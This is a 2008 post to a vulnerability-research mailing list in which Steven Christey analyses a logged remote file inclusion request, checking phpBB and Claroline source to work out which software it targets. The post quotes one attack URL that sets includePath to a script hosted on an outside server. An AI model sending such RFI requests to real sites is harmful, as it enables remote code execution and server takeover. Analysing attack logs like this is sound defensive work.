[VIM] RFI BotNet and phpBB 0-day?
Steven M. Christey
coley at linus.mitre.org
Thu Mar 20 17:19:36 UTC 2008
I tried to do something similar some time ago, automatically classifying
incoming RFI requests based with their CVE, but it was painful and
time-consuming and incomplete, for reasons you specified. So yeah,
there's probably 0-days in our logs.
Dunno if it's a botnet but given Gadi's paper from last year on web server
compromises, it's a really good theory.
> > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
I looked at the 2.0.23 source.
Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
/claroline/phpbb/page_tail.php to work. So, this is probably Claroline.
phpBB2's page_tail.php in 2.0.23 also has a direct request prevention:
if ( !defined('IN_PHPBB') )
{
die('Hacking attempt');
}
and no mention of includePath.
HOWEVER, in Claroline 1.55 (an older version) we have:
./claroline155/claroline/phpbb/page_tail.php
But - no apparent luck:
@include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php");
and no mention of includePath in that file.
claro_init_footer.inc.php seems clean.
Similar for 1.64.
However - $includePath is used all over the place in Claroline, and
apparently uses an unset(), so maybe there's a relationship with an unset
bug.
1.42 ZIP file seems corrupted, so I couldn't check it out.
Apropos to nothing, during my investigations, I found a REALLY efficient
way to create a huge file:
grep PATTERN `find . -type file` > myfile
apparently, my shell creates "myfile" before the find is executed, so grep
runs against its own results file. I caught a gig in a matter of seconds
:)
- Steve
More information about the VIM
mailing list